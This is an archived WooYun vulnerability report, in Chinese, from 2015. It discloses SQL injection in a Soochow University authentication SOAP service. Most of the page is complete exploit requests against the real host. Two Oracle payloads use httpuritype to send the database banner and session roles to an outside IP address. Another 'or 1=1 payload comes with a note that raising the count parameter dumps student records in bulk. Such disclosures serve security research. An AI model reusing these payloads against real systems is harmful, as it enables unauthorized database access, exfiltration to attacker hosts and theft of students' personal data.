乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-25: 细节已通知厂商并且等待厂商处理中 2015-05-30: 厂商已经主动忽略漏洞,细节向公众公开
某处接口存在注入.
http://authentication.suda.edu.cn/authentication.asmx?op=getUserName
加单引号报错:
有waf但可绕过.Oracle 10g , DBA权限:
POST /authentication.asmx HTTP/1.1Host: authentication.suda.edu.cnContent-Type: application/soap+xml; charset=utf-8Content-Length: 733<?xml version="1.0" encoding="utf-8"?><soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"> <soap12:Body> <getUserName xmlns="http://tempuri.org/"> <pref>'or (select cast(substr(httpuritype('http://203.7.28.101:20/'||(select(banner)from v$version where rownum=1)).getclob(),1,1000)as varchar(1000))from dual) is not null)--</pref> <count>200</count> </getUserName> </soap12:Body></soap12:Envelope>
POST /authentication.asmx HTTP/1.1Host: authentication.suda.edu.cnContent-Type: application/soap+xml; charset=utf-8Content-Length: 570<?xml version="1.0" encoding="utf-8"?><soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"> <soap12:Body> <getUserName xmlns="http://tempuri.org/"> <pref>'or (select cast(substr(httpuritype('http://203.7.28.101:20/'||(select(role)from session_roles where role like 'D%' and rownum=1)).getclob(),1,1000)as varchar(1000))from dual) is not null)--</pref> <count>200</count> </getUserName> </soap12:Body></soap12:Envelope>
POST /authentication.asmx HTTP/1.1Host: authentication.suda.edu.cnContent-Type: application/soap+xml; charset=utf-8Content-Length: 390<?xml version="1.0" encoding="utf-8"?><soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"> <soap12:Body> <getUserName xmlns="http://tempuri.org/"> <pref>'or 1=1)--</pref> <count>200</count> </getUserName> </soap12:Body></soap12:Envelope>
修改count的大小可批量获取学生信息:
(*_*)
危害等级:无影响厂商忽略
忽略时间:2015-05-30 20:58
暂无